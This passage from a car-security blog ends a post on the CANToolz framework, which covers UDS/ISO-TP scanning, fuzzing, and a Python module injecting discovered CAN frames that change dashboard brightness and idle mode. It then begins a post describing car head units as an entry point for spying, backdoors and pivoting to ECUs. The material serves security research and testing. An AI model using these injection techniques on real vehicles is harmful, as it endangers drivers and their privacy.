<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieg3Y6LqRVnFUjl4jSEj_omZiwyemkM0r844JMF5myHwxFVKPy6zXbplD4uBxICkqkJRS5dGxZ_cXbSA2upICw9y7f3y9eFRAr6CzyJjhENl06Wb-FSpyjPtxM83rkymim-lmlMTBowEu6/s1600/replayg2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieg3Y6LqRVnFUjl4jSEj_omZiwyemkM0r844JMF5myHwxFVKPy6zXbplD4uBxICkqkJRS5dGxZ_cXbSA2upICw9y7f3y9eFRAr6CzyJjhENl06Wb-FSpyjPtxM83rkymim-lmlMTBowEu6/s1600/replayg2.png" /></a></div>
<div>
<br /></div>
<div>
<h4>
Other example: Scan, ISO-TP, UDS...</h4>
</div>
<div>
<div style="text-align: justify;">
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Another interesting topic is finding UDS modes, CAN "commands" and features that are not inside the traffic (so you can't sniff it, at least so easy...). Moreover, I should say that fuzzing is interesting thing - maybe not for "bugs", but for understanding what "bytes" mean in data section. Anyway fuzzing without some information about CAN frame can be dangerous. Do not do mass fuzzing for random ID and etc. </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Now, you see that we have </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gen_ping </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">for generating packets, </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gen_fuzz </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">for fuzzing DATA - both modules are supporting ISO-TP format and </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gen_ping</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> supports UDS. </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">mod_stat</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> that also have "traffic analysis" feature trying to detect and rebuild ISOTP and UDS. </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Finally, it could look like that:</span></div>
<span id="docs-internal-guid-290a29cd-ba22-bd19-6af6-679a1ca977f1"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gen_ping</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> have finished its work, you will have some traffic: generated requests and some responses...</span></div>
</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMHzhtYm6XuQYt452-j2V_1eJE2Hc2uRZ0wZ7_Na_VaKu9ZC4PdTPOE9X3zIUWM3GZ19xzkyXDP3LGC8SWBpDK7xg24l46iLjOPmBSEO2EgCS4rKuif5yV4ZN_f7HFvzjmPxantzOIwvuP/s1600/uds1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMHzhtYm6XuQYt452-j2V_1eJE2Hc2uRZ0wZ7_Na_VaKu9ZC4PdTPOE9X3zIUWM3GZ19xzkyXDP3LGC8SWBpDK7xg24l46iLjOPmBSEO2EgCS4rKuif5yV4ZN_f7HFvzjmPxantzOIwvuP/s1600/uds1.png" /></a></div>
<span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">Then </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">mod_stat</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;"> can analyze this traffic to detect UDS/ISOTP</span><br />
<div>
<span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_umMVnZKKofwrrq4-GuJfoYgMSDJwabDnroIUh4MIETKe7ntGqS0GKrzzRhEAzufwHQdO2S17mVpCTLWJ0z2hsToUFemnhArvW-SII6wOsbqy9VUjQggPcXWznp8XjeVSmdFO2TM7xkdG/s1600/uds2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_umMVnZKKofwrrq4-GuJfoYgMSDJwabDnroIUh4MIETKe7ntGqS0GKrzzRhEAzufwHQdO2S17mVpCTLWJ0z2hsToUFemnhArvW-SII6wOsbqy9VUjQggPcXWznp8XjeVSmdFO2TM7xkdG/s1600/uds2.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<h3 style="text-align: left;">
DEV API</h3>
<div style="text-align: justify;">
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">For analyzing CAN network you will need general modules and test-scenarios. The most interesting thing will happen after you finish this analysis. There you will find some frames, understand traffic, commands, etc.; and after that you have to build module that will reproduce results of your research (or you will need to add another general module for more tricks). </span></div>
<span id="docs-internal-guid-290a29cd-ba23-f1d2-b9e2-04807ebe20ad"></span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Anyway, let me describe how easily you could do it. Imagine, I have found some CAN frames that control brightness level and IDLE status of dashboard display and now I want to add these controls into a CANToolz module. </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
</div>
<div>
Found:</div>
<div>
Message 06F#01XX000000000000 - change brightness level to XX</div>
<div>
Message 06F#0200000000000000 - IDLE mode off</div>
<div>
Message 06F#0201000000000000 - IDLE mode on</div>
<div>
<br /></div>
<div>
Next code will represent those controls as a module:</div>
<div>
<br /></div>
<div>
<ol class="j-transcripts transcripts no-bullet no-style" itemprop="text" style="background-color: #eeeeee; box-sizing: inherit; color: #3b3835; font-family: 'Helvetica Neue', Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 1.6; list-style: none; margin: 0px 0px 1.42857rem 1.4rem; padding: 0px; text-align: left;">
<li style="box-sizing: inherit; margin: 0px; padding: 0px;">from libs.module import * </li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;">from libs.can import * </li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;">import copy </li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><br /></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;">class<b> mod_panel_control</b>(CANModule): </li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><span style="line-height: 1.6;"> name = "Panel control module" </span></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><span style="line-height: 1.6;"> help = """ </span></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><span style="line-height: 1.6;"> This module change dashboard panel things. </span></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><span style="line-height: 1.6;"> Init parameters: None Module</span></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><span style="line-height: 1.6;"> parameters: 'pipe' - integer, 1 or 2 - from which pipe to print, default 1</span></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><span style="line-height: 1.6;">""" </span></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><span style="line-height: 1.6;"><br /></span></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><span style="line-height: 1.6;"> def <b>do_init</b>(self, params): </span></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><span style="line-height: 1.6;"> self._active = True</span></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><span style="line-height: 1.6;"><span style="line-height: 22.4px;"> </span>self._cmdList['1'] = ["Idle mode on", 0, "", self.turn_off]</span></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><span style="line-height: 1.6;"><span style="line-height: 22.4px;"> </span>self._cmdList['0'] = ["Idle mode off", 0, "", self.turn_on]</span></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><span style="line-height: 1.6;"><span style="line-height: 22.4px;"> </span>self._cmdList['b'] = ["Change brightness level (0 - 255)", 1, "<level>", self.change_level] <span style="line-height: 22.4px;"> </span><span style="line-height: 22.4px;"> </span><span style="line-height: 22.4px;"> </span>self._frame = None</span></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><br /></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"> def <b>do_effect</b>(self, can_msg, args): </li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"> if self._frame: </li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"> can_msg.CANFrame = copy.deepcopy(self._frame) </li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"> can_msg.CANData = True</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><span style="line-height: 1.6;"> self._frame = None </span></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"> return can_msg </li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><br /></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"> def <b>turn_off</b>(self): </li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"> self._frame = CANMessage(111,8,[2,0,0,0,0,0,0,0], False, CANMessage.DataFrame)</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><br /></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"> def <b>turn_on</b>(self): </li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"> self._frame = CANMessage(111,8,[2,1,0,0,0,0,0,0], False, CANMessage.DataFrame) </li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><br /></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"> def <b>change_level</b>(self, level): </li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"> b_level = int(level) if 0 < b_level < 256:</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"> self._frame = CANMessage(111,8,[1,b_level,0,0,0,0,0,0], False, CANMessage.DataFrame)</li>
</ol>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">do_init</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> -</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> This method will be called when the module is loaded, and it will take unit parameters from a load_module section. In this step, we are initializing commands for control and we have just three commands: idele of, on and change brightness.</span></div>
<b id="docs-internal-guid-290a29cd-ba24-ad92-1e4f-d96878bf4c37" style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">do_effect</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> -</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> It is the main method - will be called in the loop. Input parameter </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">can_msg </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">is the message from PIPE. The module should return the message back after handling, because our module is not about reading messages - we do not care about input, but we will generate new messages (command to dashboard). The same way works in all </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gen_*</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> modules. It is mean that this module can "rewrite" last message from PIPE, so you do not need to put those modules after some other modules in the same PIPE.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In this step, you need to check if we have messages to send (self._frame) and then put it into PIPE.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Other functions are commands that will be called by user request and that are important to set-up message to send (self._frame). </span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">A simple config for this setup will be:</span></div>
</div>
<div>
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" height="313" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlFem1ReF_2_qnMDBTpqW0PdvWycjXw3RYmmyeX3Ab0qsIffTBE9oEI_svfoeKrlh98skBJtIEs0_oXNsgXkP4loExJ43iGmoVAuaW039l-Q5ykbp9yUS5wN24RXOZFPqgeUc9zKAwHEF9/s640/cont1.png" width="640" /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
Other methods you can get from other modules or by review ./libs/module.py<br />
<br />
GUI, where you can easily perform these actions:</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlFem1ReF_2_qnMDBTpqW0PdvWycjXw3RYmmyeX3Ab0qsIffTBE9oEI_svfoeKrlh98skBJtIEs0_oXNsgXkP4loExJ43iGmoVAuaW039l-Q5ykbp9yUS5wN24RXOZFPqgeUc9zKAwHEF9/s1600/cont1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6elaz7SN5de3CgZUwbD1F4XHmH_JC6-N08iouKYTK8BdKx7un9kA_VbLSZaBut0okiZgdCYE4iATFSDQwYA5IgLzgJ5W4BwwKOIRQiThtfMA8XiBZKfz5EwyDNlcgoHOr1RdG-Ce8Fu0u/s1600/cont2.png" /><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Epilogue</h3>
<div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Above, I have tried to describe why I started to do this and why it is important, and I hope that some of you will find this tool useful and will contribute to it. </span></div>
<span id="docs-internal-guid-290a29cd-ba26-3dea-547d-0399c02b019d"><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">The main idea here is to give a chance for more people have an access to vehicles and hardware that we can build modules for specific things and we can create more test scenarios and modules for BlackBox testing. In addition, OEM developers and vendors can use it for tests verification or something like that (if it suits). I don’t know... so let's see together if it will fly or not 8)</span></span></div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com10tag:blogger.com,1999:blog-4711612808026791519.post-79848454341078402642015-07-23T12:57:00.001-07:002015-07-24T01:54:54.848-07:00Head Unit as a target for hackers<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Head Unit as a target for hackers.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In recent years the problem of car hacking is raised more and more frequently. It concerns almost everyone: car manufacturers, OEM and information security specialists. Of course, EU and USA authorities are also interested in it and fund research in this field. As in information security industry some activities are just attempts to scare and some problems are deliberately overestimated, I would like to look into this subject without unnecessary emotions but keeping in mind that it's always best to err on the side of caution. In my own professional realm I deal with ConnectedCar system security and embedded solutions for vehicle systems. So I would like to talk about new threats in IoT and cars in the near future. This part is about potential attack vectors on Head Unit and its environment.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img alt="https://habrastorage.org/files/a93/cc0/cad/a93cc0cade094ba9bf973f58b9787b84.jpg" height="298px;" src="https://lh5.googleusercontent.com/4d8nlp48LsMwNgpyFeNPEYtqCQrNBcfU9dHgnnLasQNM62pnNfN2BfFRdMqWBWBN5oObNDOyrDbe5U_Q6R9Gb3KEEppxCpupebrCbiKK4vnNp9tTrcMTopEhTpur1DgFg3HlX-pupwxXN1vI" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="530px;" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<a name='more'></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Is Head Unit a desirable target?</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Why did I focus on Head Unit in particular? Of course there are other interesting and more control-critical targets in vehicle system. Head Unit (hereinafter it will be shorten to HU) or to be more precise its logical component IVI (in-vehicle infotainment, but sometimes I will use termin HU as IVI) includes entertainment media and navigation system and manages such uncritical for security things as air-conditioner and cab lighting. In common car HU is not connected with crucial ECUs (Electronic Control Unit is a controller of some node: vehicle subsystem, power supply or ABS). However because of large scale of computer automation there are other interesting functions: door locks, window raisers and opening of car boot. And when I say that there is no direct network connection via CAN that doesn't mean that there are no logical interface to critical ECUs. For example in some network layouts HU is connected to CAN gateway and you can get access to more interesting components is allowed from that gateway. Or HU can be connected to some other interesting interfaces, for example Cruise Control. Here you can see the analogy with internal penetration testing, if you already have access to HU you can hack gateway as intermediate node and then attack some important ECU from it. I won't dive deep into and ECU and CAN security issues, they are already well-known and </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Charlie Miller</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Chris Valasek</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (just to show off a little bit I’ll mention that I drank a beer with Chris and other speakers on CONFidence 2011, but not sure if he even remember me) have made a review of them which includes authentication issues and brute force of ECU via CAN bus. You can find this review here - </span><a href="http://illmatics.com/car_hacking.pdf" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://illmatics.com/car_hacking.pdf</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. In summary: HU is a very good entry point. For me it is also a handiest target and that's why:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1) User data.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HU runs operation system that has access to user data. Attack on a car system can be an instrument for spying on user for example. It should be noted that all User Experience features as automatic parking or fuel payment which provide interesting user data are also located in HU.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> 2) Convenient place for a backdoor.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> HU file system is usually mounted as read-only but there are some opportunities to load a backdoor with permanent access to network. There can be technical difficulties of breaking protection created by vendor but from any point of view HU is the most convenient place to take control over the system with subsequent stable access. For those who are interested which operation systems are used for IVI, I can tell that there is a big variety: from QNX and Linux to Windows CE and Android! (in HU can be few CPU and OS, not only one)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> 3) Attack development.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This is also follows from item 2. HU is a component to start attack on ECUs (or CAN gateway) for privilege escalation and other evil. It should be added that HU has highest performance among all computers in a car. Different manufacturers use different CPUs and RAM units with various capacity but as a whole embedded hardware is rather powerful (as it is used to render some GUI, operate with network traffic, play music and do all these operations in parallel). Usually ARM Cortex 6 is used, Tegra 2 or 3, for example, but this may vary.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> 4) Suitable for remote attack.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In fanciest cars HU runs many applications, has many Internet connections. Let alone USB, Bluetooth and Wi-Fi. So it is easier to attack HU than directly ECU, because for HU various amount of attack vectors exist including attacks from the Internet. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img alt="https://habrastorage.org/files/3d4/c93/01c/3d4c9301cef74d1280204e0b900bfeaf.jpg" height="365px;" src="https://lh4.googleusercontent.com/0uuBz33yu28OJbbHmCY124HQVSeo4CcQTXPDkB7Swk9N9VUbZp50-bmVz8gvslXce6wUl9iMApb7vDeukQr1VxE4GI7ruF3twJ7GLtwl_bRp9nEYDuXGpttW7Ryil0XozVTIKqXj1n4ilAeT" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="620px;" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
